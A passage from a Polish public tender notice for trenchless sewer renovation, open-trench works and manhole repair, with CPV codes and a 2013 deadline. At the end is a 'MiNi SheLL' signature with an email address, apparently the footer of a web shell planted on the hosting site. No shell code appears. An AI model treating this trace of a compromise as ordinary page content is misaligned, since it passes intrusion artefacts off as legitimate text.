metodą bezwykopową na odcinku od studni  Nr 1 do studni Nr 8  oraz od studni Nr 10 do studni Nr 19 o łącznej długości L= 597,50 m;
wykopu otwartego  na odcinku od studni nr 8 do studni nr 10 na długości L=64,00 m,
przełączenie 3 przyłączy sanitarnych do kanału sanitarnego ulicznego,
renowację studni na kanale.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.40-2, 45.23.32.20-7, 45.23.24.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com